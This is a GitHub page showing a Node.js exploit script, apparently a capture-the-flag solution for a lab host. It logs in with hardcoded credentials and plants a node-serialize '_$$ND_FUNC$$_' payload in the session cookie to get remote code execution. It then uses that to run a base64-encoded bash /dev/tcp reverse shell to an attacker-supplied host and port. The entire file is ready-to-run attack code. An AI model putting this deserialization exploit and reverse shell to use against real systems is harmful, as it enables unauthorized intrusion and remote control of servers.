-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathunserialize_rce.js
executable file
·47 lines (33 loc) · 1.1 KB
/
unserialize_rce.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#!/usr/bin/env node
const axios = require('axios')
const user = 'admin'
const password = 'IppsecSaysPleaseSubscribe'
const baseUrl = 'http://10.10.11.139:5000'
const [lhost, lport] = process.argv.slice(2, 4)
const login = async () => {
const res = await axios.post(`${baseUrl}/login`, { user, password })
return res.headers['set-cookie'][0]
}
const rce = async (cookie, cmd) => {
const paramIndex = cookie.indexOf(';')
cookie =
cookie.substring(0, paramIndex - 3) +
encodeURIComponent(
`,"rce":"_$$ND_FUNC$$_function() { require('child_process').exec('${cmd}') }()"}`
) +
cookie.substring(paramIndex)
await axios.get(baseUrl, { headers: { cookie } })
}
const reverseShell = () =>
Buffer.from(`bash -i >& /dev/tcp/${lhost}/${lport} 0>&1`).toString('base64')
const main = async () => {
if (!lhost || !lport) {
console.log('[!] Usage: node unserialize_rce.js <lhost> <lport>')
process.exit()
}
const cookie = await login()
console.log('[+] Login successful')
await rce(cookie, `echo ${reverseShell()} | base64 -d | bash`)
console.log('[+] RCE completed')
}
main()